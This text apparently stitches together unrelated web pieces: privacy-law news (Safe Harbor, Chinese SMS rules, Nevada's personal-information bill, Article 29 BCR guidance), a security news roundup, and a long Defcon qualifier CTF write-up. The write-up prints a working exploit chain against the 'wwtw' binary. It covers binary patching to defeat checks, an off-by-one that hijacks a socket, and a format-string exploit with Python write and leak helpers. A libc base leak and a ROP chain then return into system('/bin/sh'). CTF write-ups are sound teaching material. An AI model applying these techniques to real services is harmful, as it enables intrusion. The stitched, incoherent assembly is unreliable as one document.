In his case against Facebook, Austrian law student Max Schrems challenges the Irish Data Protection Commissioner’s claim that the Safe Harbor agreement precluded the agency from stopping data transfers from Ireland to the U.S. by Facebook, which participates in the Safe Harbor. Schrems’ case was prompted by the Snowden revelations about U.S. national security authorities accessing personal data of EU citizens transferred to the U.S. via the Safe Harbor Framework. Schrems is seeking the end of the U.S.-EU Safe Harbor Framework.

Hunton Authors Bloomberg BNA Portfolio on Cybersecurity

Hunton & Williams LLP’s Global Privacy and Cybersecurity practice group has written a portfolio for Bloomberg BNA on information security and data breach issues in the United States and globally. Cybersecurity and Data Breach offers a broad overview of relevant legal requirements in the United States, European Union and select countries around the world. The portfolio includes practical guidance and advice on managing a data security breach, from managing an investigation and conducting remediation to providing notification to affected individuals, regulators, consumer reporting agencies, employees, boards of directors and the public. It also provides details on proactive cyber readiness activities such as preparing an Incident Response Plan, conducting tabletop exercises, and developing a vendor and employee management program. Cybersecurity and Data Breach is available at Bloomberg BNA’s Privacy & Data Security Law Resource Center and also at Bloomberg Law.

“Companies spend millions of dollars rebuilding their brand and retaining customers after suffering a data breach,” said Lisa Sotto, chair of Hunton & Williams’ global privacy and cybersecurity practice. Aaron Simpson, partner in the firm’s Global Privacy and Cybersecurity practice, added, “The number of cyber attacks continues to rise at an unprecedented rate, and companies need to prepare. Data breaches are inevitable, but preparation can mitigate the harm.”

Hunton & Williams’ Global Privacy and Cybersecurity practice helps companies manage data at every step of the information life cycle. The firm has been ranked as a top law firm for privacy and data security by Chambers and Partners and The Legal 500. Computerworld magazine recognized Hunton & Williams as the best global privacy advisor in each of its four surveys. Hunton & Williams also was selected for a Fortune 50 client’s 2013 Law Firm Award for its privacy work, noting that the privacy team’s “laser focus on the issues resulted in a flawless execution.”

China’s Ministry of Industry and Information Technology Published Rules Governing Use of Text Messaging

On May 19, 2015, China’s Ministry of Industry and Information Technology promulgated its Provisions on the Administration of Short Messaging Services (the “Provisions”), which will take effect on June 30, 2015.

Prepared to combat improper texting practices, such as junk short messages, the Provisions were adopted under the July 2014 People’s Republic of China (“P.R.C.”) Telecommunications Rules (“2014 Revision”) and the December 2012 Resolution of the Standing Committee of the National People’s Congress Relating to Strengthening the Protection of Information on the Internet for purposes of (1) normalizing conduct related to short messaging services (“SMS”), (2) protecting the lawful interests of users, and (3) promoting the sound development of a market for SMS.

The Provisions are important in several ways. First, they establish certain basic operating requirements which SMS providers must observe in their text messaging campaigns. Under these requirements:

  • SMS providers must hold a telecommunications enterprise license;
  • when SMS providers charge user fees, the charges must be made in accordance with applicable laws, regulations and standards;
  • SMS providers must maintain records of the times of transmission, user receipts and when a user unsubscribes; and
  • SMS providers must not use SMS systems to circulate or broadcast illicit content.

Second, the Provisions establish more detailed rules (for example, compared to the earlier amendment to the P.R.C Law on the Protection of the Interests of Consumers or its implementing measures published on January 5, 2015) on the manner in which text messages may be sent to consumers. Under the Provisions’ rules:

SMS providers and short messaging content providers must not send commercially-purposed text messages to end users without their consent or request;

  • when end users provide their consent, the type, frequency and duration of the planned broadcast campaign must be made clear;
  • commercially-purposed text messages must not be sent to certain (non-commercially oriented) ports;
  • commercially-purposed text messages must include an expedient and effective method for unsubscribing; and
  • SMS providers must establish a system for supervising text messages, and an early warning and monitoring mechanism.

In addition to the foregoing rulemaking, the Provisions establish practical channels by which consumer interests could be protected. These include:

  • The Provisions establish a system by which consumers can make complaints and file reports. They establish a reporting and handling center under the auspices of the Ministry of Industry and Information Technology, through which reports of “nasty” (不良) or junk short messages can be processed. They also clarify procedures under which infringements and violations involving text messages can be handled, and under which punishments can be meted out.
  • The Provisions strengthen the oversight and inspection system. They clarify the authority and duty of the regulatory authority to carry out oversight and inspection, and the corresponding duties of SMS providers.
  • The Provisions establish penalties for unlawful behavior among SMS providers, short messaging content providers, personnel of the supervisory authority, and personnel of the reporting and handling center. Violations are subject to being recorded in a permanent file, and responsible persons may be subject to “supervisory discussion.”

Apart from regulating conventional SMS, the Provisions also extend to information delivery services similar to SMS that use the Internet. Article 38 of the Provisions provides that delivery services which send information having the characteristics of a short message (for example, text, data, voice or images) to fixed telephones, mobile telephones and other communications end-users, via the Internet, shall be conducted with reference to the Provisions.

By their terms, the Provisions only affect the use and transmission of text messages. This makes them rather specific in their scope and impact. The Provisions have, however, the potential to materially increase operational requirements for those companies which rely on the use of text messages. They also clarify how such companies may be held accountable.

In the abstract, the Provisions are a particularly fine-grained illustration of China’s ongoing reliance on a sector-by-sector approach to the development of its regulatory framework on personal information.

Nevada Expands Definition of Personal Information

On May 13, 2015, Nevada Governor Brian Sandoval (R-NV) signed into law A.B. 179 (the “Bill”), which expands the definition of “personal information” in the state’s data security law. The law takes effect on July 1, 2015. Under the Bill, personal information now includes:

  • a “user name, unique identifier or electronic mail address in combination with a password, access code, or security question and answer that would permit access to an online account;”
  • a medical identification or health insurance identification number; and
  • a driver authorization card number.

In addition, although Nevada’s data security law previously excluded “publicly available information. . . lawfully made available to the general public” from the definition of personal information, the Bill narrows the scope of that exclusion, limiting it to information available “from federal, state or local governmental records.”

View the text of the Bill.

Defcon quals: wwtw (a series of vulns)

Hey folks,

This is going to be my final (and somewhat late) writeup for the Defcon Qualification CTF. The level was called "wibbly-wobbly-timey-wimey", or "wwtw", and was a combination of a few things (at least the way I solved it): programming, reverse engineering, logic bugs, format-string vulnerabilities, some return-oriented programming (for my solution), and Dr. Who references!

I'm not going to spend much time on the theory of format-string vulnerabilities or return-oriented programming because I just covered them in babyecho and r0pbaby.

And by the way, I'll be building the solution in Python as we go, because the first part was solved by one of my teammates, and he's a Python guy. As much as I hated working with Python (which has become my life lately), I didn't want to re-write the first part and it was too complex to do on the shell, so I sucked it up and used his code.

You can download the binary here, and you can get the exploit and other files involved on my github page.

Part 1: The game

The first part's a bit of a game. I wasn't all that interested in solving it, so I patched it out (see the next section) and discovered that there was another challenge I could work on while my teammate solved the game. This is going to be a very brief overview of my teammate's solution.

When you start wwtw, you will see this:

You(^V<>) must find your way to the TARDIS(T) by avoiding the angels(A).
Go through the exits(E) to get to the next room and continue your search.
But, most importantly, don't blink!
   012345678901234567890
00        <
01
02  A
03
04            A
05
06                AA
07    A        A
08 A
09
10  A     A
11                  A
12                 A
13
14                    A
15    A
16 A   A              E
17
18                A
19  A
Your move (w,a,s,d,q):

After a few seconds, it times out. The timeout can be patched out, if you want, but the timeouts are actually somewhat important in this level as we'll see later.

You can move around your character using the w,a,s,d keys, as indicated in the little message. Your goal is to reach the tardis - represented by a 'T' - by going through the exits - represented by 'E's - and avoiding the angels - represented by 'A's. The angels will follow you when your back is turned. This stuff is, of course, a Dr. Who reference. :)

The solution to this was actually pretty straight forward: a greedy algorithm that makes the "best" move toward the exit to a square that isn't occupied by an angel works 9 times out of 10, so we stuck with that and re-ran it whenever we got stuck in a corner or along the wall.

You can see the code for it in the exploit. I'm not going to dwell on that part any longer.

Part 1b: skipping the game

As I said, I didn't want to deal with solving the game, I wanted to get to the good stuff (so to speak), so I "fixed" the game such that every move would appear to be a move to the exit (it would be possible to skip the game part entirely, but this was easy and worked well enough).

This took a little bit of trial and error, but I primarily used the failure message - "Enjoy 1960..." - to figure out where in the binary to look.

If you look at all the places that string is found (in IDA, use shift-f12 or just search for it), you'll find one that looks like this:

.text:00002E14          lea     eax, (aEnjoy1960____0 - 5000h)[ebx] ; "Enjoy 1960..."

If you look back a little bit, you'll find that the only way to get to that line is for this conditional jump to occur:

.text:00002DC0 83 7D F4 01                             cmp     [ebp+var_C], 1
.text:00002DC4 75 48                                   jnz     short loc_2E0E

It's pretty easy to fix that, you can simply replace the jnz - 75 48 - with nops - 90 90. Here's a diff:

--- a   2015-06-03 17:09:22.000000000 -0700
+++ b   2015-06-03 17:09:44.000000000 -0700
@@ -3635,7 +3635,8 @@
     2db8:      e8 7f ed ff ff          call   1b3c <main+0x937>
     2dbd:      89 45 f4                mov    %eax,-0xc(%ebp)
     2dc0:      83 7d f4 01             cmpl   $0x1,-0xc(%ebp)
-    2dc4:      75 48                   jne    2e0e <main+0x1c09>
+    2dc4:      90                      nop
+    2dc5:      90                      nop
     2dc6:      8d 83 e0 00 00 00       lea    0xe0(%ebx),%eax
     2dcc:      8b 00                   mov    (%eax),%eax
     2dce:      83 f8 03                cmp    $0x3,%eax

Aside: Making the binary debug-able

Just as a quick aside: this program is a PIE - position independent executable - which means the addresses you see in IDA are all relative to 0. But when you run the program, it's assigned a "proper" address, even if ASLR is off. I don't know if there's a canonical way to deal with that, but I personally use this little trick in addition to turning off ASLR:

  1. Replace the first instruction in the start() or main() function with "\xcc" (software breakpoint) (and enough nop instructions to overwrite exactly one instruction)
  2. Run it in a debugger such as gdb
  3. (Optionally) use a .gdbinit file that automatically resumes execution when the breakpoint is hit

Here's the first line of start() in wwtw:

.text:00000A60 31 ED                                   xor     ebp, ebp

Since it's a two byte instruction ("\x31\xED"), we open the binary in a hex editor and replace those two bytes with "\xcc\x90" (the "\x90" being a nop instruction). If you try to execute it after that change, you should see this if you did it right:

$ ./wwtw-blog
Trace/breakpoint trap

And with a debugger, you can continue execution after that breakpoint:

$ gdb -q ./wwtw-blog
(gdb) run
Starting program: /home/ron/defcon-quals/wwtw/wwtw-blog

Program received signal SIGTRAP, Trace/breakpoint trap.
0x56555a61 in ?? ()
(gdb) cont
Continuing.
You(^V<>) must find your way to the TARDIS(T) by avoiding the angels(A).
Go through the exits(E) to get to the next room and continue your search.
[...]

You can also use a gdbinit file:

$ echo -e 'run\ncont' > gdbhax
$ gdb -q -x ./gdbhax ./wwtw-blog
Program received signal SIGTRAP, Trace/breakpoint trap.
0x56555a61 in ?? ()
You(^V<>) must find your way to the TARDIS(T) by avoiding the angels(A).
Go through the exits(E) to get to the next room and continue your search.
But, most importantly, don't blink!
[...]

Part 2: Starting the ignition (by debugging)

After you complete the fifth room and get to the Tardis, you're prompted for a key:

TARDIS KEY: abcd
Wrong key!
Enjoy 1960...
$ bcd

Funny story: I had initially nop'd out the failure condition when I was trying to nop out the "you've been eaten by an angel" code from earlier, so it actually took me awhile to even realize that this was a challenge. I had accidentally set it to - as I describe in the next section - accept any password. :)

Anyway, one thing you'll notice is that when it prompts you for the key, you can type in multiple characters, but after it kicks you out it prints all but the first character on the commandline. That's interesting, because it means that it's only consuming one character at a time and is therefore vulnerability to a bunch of attacks. If you happen to guess a correct character, it consumes one more:

TARDIS KEY: Uabcd
Wrong key!
Enjoy 1960...
$ bcd

(Note that it consumed both the "U" and the "a" this time)

Because it's checking one character at a time, it's pretty easy to guess it one character at a time - 62 max tries per character (31 on average) and a 10-character string means it could be guessed in something like 600 - 1000 runs. But we can do better than that!

I searched the source in IDA for the string "TARDIS KEY:" to get an idea of where to look for the code. You will find it at 0x00000ED1, which is in a fairly short function called from main(). In it, you'll see a call to both read() and getchar(). But more importantly, in the whole function, there's only one "cmp" instruction that takes two registers (as opposed to a register and an immediate value (ie, constant)):

.text:00000F45 39 C2                                   cmp     edx, eax

If I had to take a wild guess, I'd say that this function somehow verifies the password you type in using that comparison. And if we're lucky, it'll be a comparison between what we typed and what they expected to see (it doesn't always work out that way, but when it does, it's awesome).

To set a breakpoint, we need to know which address to break at. The easiest way to do that is to disable ASLR and just have a look at what address stuff loads to. It shouldn't change if ASLR is off.

On my machine, wwtw loads to 0x56555000, which means that comparison should be at 0x56555000 + 0x00000f45 = 0x56555f45. We can verify in gdb:

(gdb) x/i 0x56555f45
   0x56555f45:  cmp    edx,eax

We want to put a breakpoint there and print out both of those values to make sure that one is what we typed and the other isn't. I added the breakpoint to my gdbhax file because I know I'm going to be using it over and over:

$ cat gdbhax
run
b *0x56555f45
cont

And run the process (punching in whatever you want for the five moves, since we've already "fixed" the game):

$ gdb -q -x ./gdbhax ./wwtw-blog
[...]
Program received signal SIGTRAP, Trace/breakpoint trap.
0x56555a61 in ?? ()
Breakpoint 1 at 0x56555f45
You(^V<>) must find your way to the TARDIS(T) by avoiding the angels(A).
Go through the exits(E) to get to the next room and continue your search.
But, most importantly, don't blink!

[...]

TARDIS KEY: a

Breakpoint 1, 0x56555f45 in ?? ()
(gdb)
(gdb) print/c $edx
$2 = 65 'a'
(gdb) print/c $eax
$3 = 85 'U'
(gdb)

It's comparing the first character we typed ("a") to another character ("U"). Awesome! Now we know that at that comparison, the proper character is in $eax, so we can add that to our gdbhax file:

$ cat gdbhax
run
b *0x56555f45

cont

while 1
  print/c $eax
  cont
end

That little script basically sets a breakpoint on the comparison, then each time it breaks it prints eax and continues execution.

When you run it a second time, we start with "U" and then whatever other character so we can get the second character:

$ gdb -q -x ./gdbhax ./wwtw-blog
[...]
TARDIS KEY: Ua

Breakpoint 1, 0x56555f45 in ?? ()
$1 = 85 'U'

Breakpoint 1, 0x56555f45 in ?? ()
$2 = 101 'e'
Wrong key!

Then run it again with "Ue" at the start:

Breakpoint 1, 0x56555f45 in ?? ()
$1 = 85 'U'

Breakpoint 1, 0x56555f45 in ?? ()
$2 = 101 'e'

Breakpoint 1, 0x56555f45 in ?? ()
$3 = 83 'S'

...and so on. Eventually, you'll get the key "UeSlhCAGEp". If you try it, you'll see it works:

TARDIS KEY: UeSlhCAGEp
Welcome to the TARDIS!
Your options are:
1. Turn on the console
2. Leave the TARDIS

Part 2b: Without brute force

Usually in CTFs, if a password or key is English-looking text, it's probably hardcoded, and if it's random looking, it's generated. Since that key was obviously not English, it stands to reason that it's probably generated and therefore would not work against the real service. At this point, my teammate hadn't solved the "game" part yet, so I couldn't easily test against the real server. Instead, I decided to dig a bit deeper to see how the key was actually generated. Spoiler: it doesn't actually change, so this wound up being unnecessary. There's a reason I take a long time to solve these levels. :)

At the start of the function that references the "TARDIS KEY:" string (the function contains, but doesn't start at, address 0x00000ED1), you'll see this line:

.text:00000EEF        lea     eax, (check_key - 5000h)[ebx]

Later, that variable is read, one byte at a time:

.text:00000EFA top_loop:                               ; CODE XREF: check_key+A4j
.text:00000EFA                 mov     eax, [ebp+key_thing]
.text:00000EFD                 movzx   eax, byte ptr [eax]
.text:00000F00                 movsx   eax, al
.text:00000F03                 and     eax, 7Fh
.text:00000F06                 mov     [esp], eax      ; int
.text:00000F09                 call    _isalnum

At each point, it reads the next byte, ANDs it with 0x7F (clearing the uppermost bit), and calls isalnum() on it to see if it's a letter or a number. If it's a valid letter or number, it's considered part of the key; if not, it's skipped.

It took me far too long to see what was going on: the function I called check_key() actually references itself and reads its own code! It reads the first dozen or so bytes from the function's binary and compares the alpha-numeric values to the key that was typed in.

To put it another way: if you look at the start of the function in a hex editor, you'll see:

55 89 E5 53 83 EC 24 E8 DC FB FF FF 81 C3 3C 41...

If we AND each of these values by 0x7F and convert them to a character, we get:

1.9.3-p392 :004 > "55 89 E5 53 83 EC 24 E8 DC FB FF FF 81 C3 3C 41".split(" ").each do |i|
1.9.3-p392 :005 >     puts (i.to_i(16) & 0x7F).chr
1.9.3-p392 :006?>   end
U

e
S

l
$
h
\
{



C
<
A

If you exclude the values that aren't alphanumeric, you can see that the first 16 bytes becomes "UeSlhCA", which is the first part of the code to start the engine!

Satisfied that it wasn't random, I moved on.

Aside: Why did they use the function as the key?

Just a quick little note in case you're wondering why the function used itself to generate the password...

When you set a software breakpoint (which is by far the most common type of breakpoint), behind the scenes the debugger replaces the instruction with a software breakpoint ("\xcc"). After it breaks, the real instruction is briefly replaced so the program can continue.

If you break on the first line of the function, then instead of the first line of the function being "\x55", which is "pop ebp", it's "\xCC" and therefore the value will be wrong. In fact, putting a breakpoint anywhere in the first ~20 bytes of that function will cause your passcode to be wrong.

I suspect that this was used as a subtle anti-debugging technique.

Part 2c: Skipping the password check

Much like the game, I didn't want to have to deal with entering the password each time around, so I found the call that checks whether or not that password was valid:

.text:0000125E                 test    eax, eax
.text:00001260                 jz      short loc_129C
.text:00001262                 lea     eax, (aWrongKey - 5000h)[ebx] ; "Wrong key!"

And switched the jz ("\x74\x3a") to a jmp ("\xeb\x3a"). Once you've done that, you can type whatever you want (including nothing) for the key.

Part 3: Time travelling

Now that you've started the Tardis, there's another challenge: you can only turn on the console during certain times:

Welcome to the TARDIS!
Your options are:
1. Turn on the console
2. Leave the TARDIS
Selection: 1
Access denied except between May 17 2015 23:59:40 GMT and May 18 2015 00:00:00 GMT

Looking around in IDA, I see some odd stuff happening. For example, the program attempts to connect to localhost on a weird port and read some data from it! The function that does that is called sub_CB0() if you want to have a look. After it connects, it sets up an alarm() that calls sub_E08() every 2 seconds. In that function, it reads 4 bytes from the socket and stores them. Those 4 bytes turned out to be a timestamp.

Basically, it has a little timeserver running on localhost that sends it the current time. If we can make it use a different server, we can provide a custom timestamp and bypass this check. But how?

I played around quite a bit with this, but I didn't make any breakthroughs till I ran it in strace.

To run the program in strace, we no longer need the debugger, so we have to fix the first two bytes of start():

.text:00000A60 31 ED                                   xor     ebp, ebp

and run strace on it to see what's going on:

socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 3
setsockopt(3, SOL_SOCKET, SO_RCVTIMEO, "\0\0\0\0\350\3\0\0", 8) = 0
connect(3, {sa_family=AF_INET, sin_port=htons(1234), sin_addr=inet_addr("127.0.0.1")}, 16) = 0
write(3, "\0", 1)                       = 1
read(3, 0xffffcd88, 4)                  = -1 ECONNREFUSED (Connection refused)
[...]
--- SIGALRM {si_signo=SIGALRM, si_code=SI_KERNEL, si_value={int=111, ptr=0x6f}} ---
write(3, "\0", 1)                       = 1
read(3, 0xffffc6d8, 4)                  = -1 ECONNREFUSED (Connection refused)
alarm(2)                                = 0
sigreturn() (mask [])                   = 3
read(0, 0x5655a0b0, 9)                  = ? ERESTARTSYS (To be restarted if SA_RESTART is set)
[...]

Basically, it makes the connection and gets a socket numbered 3. Every 2 seconds, it reads a timestamp from the socket. One of the first things I often do while working on CTF challenges is disable alarm() calls, but in this case it was actually needed! I suspected that this is another anti-debugging measure - to catch people who disabled alarm() - and therefore I should look for the vulnerability in the callback function.

It turns out there wasn't really that much code, but the vulnerability was somewhat subtle and I didn't notice until I ran it in strace and typed a bunch of "A"s:

read(0, AAAAAAAAAAAAAAAAAAAAAAAA
"AAAAAAAAA", 9)                 = 9
write(1, "Invalid\n", 8Invalid
)                = 8
[...]
--- SIGALRM {si_signo=SIGALRM, si_code=SI_KERNEL, si_value={int=111, ptr=0x6f}} ---
write(65, "\0", 1)                      = -1 EBADF (Bad file descriptor)
read(65, 0xffffc6d8, 4)                 = -1 EBADF (Bad file descriptor)
alarm(2)                                = 0
[...]

When I put a bunch of "A"s into the prompt, it started reading from socket 65 (aka, 0x41 or "A") instead of from socket 3! There's an off-by-one vulnerability that allows you to change the socket identifier!

If you were to use "AAAAAAAA\0", it would overwrite the socket with a NUL byte, and instead of reading from socket 3 or 65, it would read from socket 0 - stdin. The very same socket we're already sending data to!

Here's the python code to exploit this:

sys.stdout.write("01234567\0")
sys.stdout.flush()

time.sleep(2) # Has to be at least 2

sys.stdout.write("\x6d\x2b\x59\x55")
sys.stdout.flush()

That hex value is a timestamp during the prescribed time. When it reads that from stdin rather than from the socket it opened, it thinks the time is right and we can then activate the TARDIS!

Part 3b: Skipping the timestamp check

Once again, in the interest of being able to test without waiting 2 seconds every time, we can disable the timestamp check altogether. To do that, we find the error message:

.text:00001409  lea     eax, (aAccessDeniedEx - 5000h)[ebx] ; "Access denied except between %s and %s\"...

...and look backwards a little bit to find the jump that gets you there:

.text:000013BE E8 45 FA FF FF      call    check_timestamp
.text:000013C3 85 C0               test    eax, eax
.text:000013C5 74 2F               jz      short loc_13F6
.text:000013C7 8D 83 22 E1 FF FF   lea     eax, (aTheTardisConso - 5000h)[ebx] ; "The TARDIS console is online!"

And make sure it never happens (by replacing "\x74\x2F" with "\x90\x90"). Now we can jump directly to pressing "1" to active the TARDIS and it'll come right online:

$ ./wwtw-blog-nodebug
[...]
Welcome to the TARDIS!
Your options are:
1. Turn on the console
2. Leave the TARDIS
Selection: 1
The TARDIS console is online!Your options are:
1. Turn on the console
2. Leave the TARDIS
3. Dematerialize
Selection:

Part 4: Getting the coordinates

When we select option 3, we're prompted for coordinates:

Your options are:
1. Turn on the console
2. Leave the TARDIS
3. Dematerialize
Selection: 3
Coordinates: 1,2
1.000000, 2.000000
You safely travel to coordinates 1,2

If you look at the function that contains the "You safely travel..." string, you'll see that one of three things can happen:

  • It prints "Invalid coordinates" if you put anything other than two numbers (as defined by strtof() returning with no error, which means we can put a number then text without being "caught")
  • It prints "You safely travel to coordinates [...]" if you put valid coordinates
  • It prints "XXX is occupied by another TARDIS" if some particular set of coordinates are entered

The "XXX" in the output is actually the coordinates the user typed, as a string, passed directly to printf(). And we remember why printf(user_string) is bad, right? (Hint: format string attacks)

The function to calculate the coordinates used a bunch of floating point math, which made me sad - I don't really know how to reverse floating point stuff, and I don't really want to learn in the middle of a level. Fortunately, I noticed that two global variables were used:

.text:0000112B                 fld     ds:(dbl_3170 - 5000h)[ebx]
[...]
.text:00001153                 fld     ds:(dbl_3178 - 5000h)[ebx]

And if you look at the variables, you'll see:

.rodata:00003170 dbl_3170        dq 51.492137            ; DATA XREF: do_jump_EXPLOITME+104r
.rodata:00003170                                         ; do_jump_EXPLOITME+11Ar
.rodata:00003178 dbl_3178        dq -0.192878            ; DATA XREF: do_jump_EXPLOITME+12Cr
.rodata:00003178                                         ; do_jump_EXPLOITME+13Er

So that's kind of a freebie. If we enter them, it works:

Your options are:
1. Turn on the console
2. Leave the TARDIS
3. Dematerialize
Selection: 3
Coordinates: 51.492137,-0.192878
51.492137, -0.192878
Coordinate 51.492137,-0.192878 is occupied by another TARDIS.  Materializing there would rip a hole in time and space. Choose again.

And, to finish it off, let's verify that there is indeed a format-string vulnerability there:

Coordinates: 51.492137,-0.192878 %x %x %x
51.492137, -0.192878
Coordinate 51.492137,-0.192878 58601366 4049befe ef0f16f4 is occupied by another TARDIS.  Materializing there would rip a hole in time and space. Choose again.

Coordinates: 51.492137,-0.192878 %n
51.492137, -0.192878
Segmentation fault

Yup! :)

Part 4b: Format string exploit

I'm not going to spend any time explaining what a format string vulnerability is. If you aren't familiar, check out my last blog.

Instead, we're going to look at how I exploited this one. :)

The cool thing about this is, as you can see in the last example, if you enter "collision" coordinates (ie, the ones that trigger the format string vulnerability), the function doesn't actually return, it just prompts again. The function doesn't return until you enter valid-looking coordinates (like 1,1).

That's really handy, because it means we can exploit it over and over before letting it return. Instead of the crazy math we had to do in the earlier level, we can just write one byte at a time. And speaking of the last level, I actually solved this level before babyecho, so I didn't have the handy format-string generator that I wrote.

write_byte()

I wrote a function in python that will write a single byte to a chosen address:

def write_byte(addr, value):
    s = "51.492137,-0.192878 " + struct.pack("<I", addr)
    s += "%" + str(value + 256 - 24) + "x%20$n\n"

    print s
    sys.stdout.flush()
    sys.stdin.readline()

Basically, it uses the classic "AAAA%NNx%MM$n" string, which we saw a whole bunch in babyecho, where:

  • AAAA = the address as a 4-byte string (which will be the address written to by the %n)
  • NN = the number of bytes to waste to ensure that %n writes the proper value to AAAA (keeping in mind that the coordinates and address take up 24 bytes already)
  • MM = the number of elements on the stack before the format string reads itself (we can figure that out by bruteforce then hardcode it)

If that doesn't make sense, read the last blog - this is exactly the same attack (except simpler, because we only have to write a single byte).

leak()

Meanwhile, my teammate wrote this function that, while ugly, can leak arbitrary memory addresses using "%s":

def leak(address):
    print >> sys.stderr, "*** Leak 0x%04x" % address
    s = "51.492137,-0.192878 " + struct.pack("<I", address) + " >>>%20$s<<<"
    s = "    51.492137,-0.192878 >>>%24$s<<< " + struct.pack("<IIII", address, address, address, address)
    #print >> sys.stderr, "s", repr(s)
    print s
    sys.stdout.flush()
    sys.stdin.readline() # Echoed coordinates.
    resp = sys.stdin.readline()
    #print >> sys.stderr, "resp", repr(resp)
    m = re.search(r'>>>(.*)<<<', resp, flags=re.DOTALL)
    while m is None:
        extra = sys.stdin.readline()
        assert extra, repr(extra)
        resp += extra
        print >> sys.stderr, "read again", repr(resp)
        m = re.search(r'>>>(.*)<<<', resp, flags=re.DOTALL)
    assert m is not None, repr(resp)
    resp = m.group(1)
    if resp == "":
        resp = "\0"
    return resp

Then, exactly like the last blog, we use the vulnerability to leak a return address and frame pointer, then overwrite the return address with a chosen address, and thus obtain EIP control.

Getting libc's base address

Next, we needed an address to return to. This was a little tricky, since I wasn't able to steal a copy of their libc.so file (it's the only 32-bit level our team worked on) - that means I could easily exploit myself, because I have libc handy, but I couldn't exploit them. There's a "pwntool" module that can find base addresses given a memory leak, but it was too slow and the binary would time out before it finished (more on that later).

So, I used the format-string vulnerability and a bit of experience to get the base address of libc. We use %s in the format string to leak data from the PLT and get an address of anything in the libc binary - I chose to find printf() because it's the first one I could think of. That's at a static offset in the wwtw binary file (we already know the return address, since we leaked it off the stack, and that can be used to calculate where the PLT is).

Once I had that address, I worked my way backwards, reading the first bytes of each page (multiple of 0x1000) until I found an ELF header. Here's the code:

bf = printf_addr - 0xc280
while True:
    print >> sys.stderr, "Checking", hex(bf), " (printf - ", hex(printf_addr - bf), ")..."
    str = leak(bf)
    print >> sys.stderr, hexify(str)
    if(str[0:4] == "\x7FELF"):
        break

    bf -= 0x1000

I now had the relative offset of printf(), which means given the address of printf(), I can find the base address deterministically.

Getting system()'s address

Once I had the base address, I wanted to find the address of system(). I don't normally like using stuff I didn't write, because it's really hard to troubleshoot when there's a problem, but I couldn't find an easy way to do this by bruteforce, so I tried using pwntools ('leak' refers to the function shown earlier):

d = dynelf.DynELF(leak, libc_base_REAL)
system_addr = d.lookup("system", 'libc')

Once again, this was too slow and kept timing out. I looked at some options, like stealing the libc binary from memory by returning into the write() libc function (like I did in ropasaurusrex) or trying to make pwntools start where it left off after being disconnected, but none of it would work.

(in retrospect, I probably could have silently re-connected/re-solved the first half of the level in the leak() function and just continued where I left off, but that didn't occur to me till now, like two weeks later)

After fighting for far too long, I had a realization: maybe my home Internet connection just sucks. I uploaded the script to my server and it found the address on the first try (and solved the game portion like 10x faster).

Getting "/bin/sh"'s address

Although I ended up with the address of system(), getting the address of "/bin/sh" from libc might be a bit tricky, so instead I simply put the string in my own input buffer - the same buffer that contains the format string - and calculated the offset from the leaked ebp value to that address. Since it was on the stack, it was always at a fixed offset from the saved ebp, which we had access to.

I could easily have leaked libc until I found the offset to the string, but that's completely unnecessary.

Building the ROP chain

In the end, I had the address of system() and the address of "/bin/sh" in my buffer. I used them to construct a really simple ROP chain, similar to the one used in r0pbaby (the difference is that, since we're on 32-bit for this level, we can pass the address of "/bin/sh" on the stack and don't have to worry about finding a gadget):

write_byte(return_ptr+0, (system_addr >> 0) & 0x0FF)
write_byte(return_ptr+1, (system_addr >> 8) & 0x0FF)
write_byte(return_ptr+2, (system_addr >> 16) & 0x0FF)
write_byte(return_ptr+3, (system_addr >> 24) & 0x0FF)

write_byte(return_ptr+4, 0x5e)
write_byte(return_ptr+5, 0x5e)
write_byte(return_ptr+6, 0x5e)
write_byte(return_ptr+7, 0x5e)

sh_addr = buffer_addr + 200 + FUDGE
write_byte(return_ptr+8,  (sh_addr >> 0) & 0x0FF)
write_byte(return_ptr+9,  (sh_addr >> 8) & 0x0FF)
write_byte(return_ptr+10, (sh_addr >> 16) & 0x0FF)
write_byte(return_ptr+11, (sh_addr >> 24) & 0x0FF)

Basically, I wrote the 4-byte address of system() over the actual return address in four separate printf() calls. Then I wrote 4 useless bytes (they don't really matter - they're system()'s return address so I made them something distinct so I can recognize the crash after system() returns). Then I wrote the address of "/bin/sh" over the next 4 bytes (the first parameter to system()).

Once that was done, I sent "good" coordinates - 100000,100000 - which caused the function to return. Since the return address had been overwritten, it returned to system("/bin/sh") and it was game over.

Conclusion

I really liked this level because it was multiple parts.

First, we had to solve a game by making some simple AI.

Second, we had to find the "key" by either reverse engineering or debugging.

Third, we had to fix the timestamp using an off-by-one error.

And finally, we had to use a format string vulnerability to get EIP control and win the level.

One interesting dynamic of this level was that there were anti-debugging features in this level. One was the timeout that had to be used for the off-by-one error, since people frequently remove calls to alarm(), and the other was using the first few bytes of a function for something meaningful to mess with software breakpoints.

Community news and analysis: May 2015

Featured news

  • How effective are the security questions—and answers—used to protect sensitive accounts and information? Not very, according to new Google research. Read about how easy it is for hackers and bots to guess answers to common questions, and what users can do about it.
  • Google also published research last month on the ad injection economy (key findings here, full report here).
  • Mozilla sent a communication to CAs with root certificates included in Mozilla’s program; Mozilla, acting in the best interest of users, asked CAs to respond to five action items. They’ve stated they intend to publish the responses this month.
  • WordPress users: The Automattic team released WordPress 4.2.2, featuring critical security fixes, the first week of May. Please make sure you’re updated!
  • DomainTools put together their first report profiling malicious domains by delving into domain registration attributes and overlaying this with data on malicious activity. Their summary links to the full report here.

Malware news + analysis

  • ESET: Whitepaper on CPL malware in Brazil
  • Sophos: “PolloCrypt” ransomware sounds as ridiculous as its mascots look—but it’s a real thing targeting Aussie users. Also from Sophos: Can Rombertik malware really destroy your computer? Nope.
  • Fortinet analyses of Rombertik malware and Tinba botnet malware
  • Sucuri: Hacked websites redirect to...Bitcoin?

Other security news

  • SiteLock: Who else is reading your email? A guide to PGP encryption
  • Fortinet: Should new WHO disease-naming guidelines also be applied to malware?

Article 29 Working Party Issues Updated Guidance on BCRs for Processors

On May 22, 2015, the Article 29 Working Party published an update to its explanatory document regarding the use of Binding Corporate Rules (“BCRs”) by data processors (“WP204”). The original explanatory document was published on April 19, 2013 and identified two scenarios in which a non-EU processor, processing personal data received under BCRs, should notify the controller and the relevant data protection authorities (“DPAs”) in the event of a legally binding request for the personal data.

In summary, the scenarios are:

  • Anticipation of non-EU disclosure requirements – If the non-EU processor believes that local laws (whether current or anticipated) may require it to disclose personal data to non-EU regulators or government agencies (or might otherwise result in the non-EU processor being unable to comply with its obligations under the BCRs), it should notify three parties of the local law requirements:
    • the controller;
    • the processor group’s EU headquarters; and
    • the DPA in the controller’s EU Member State.
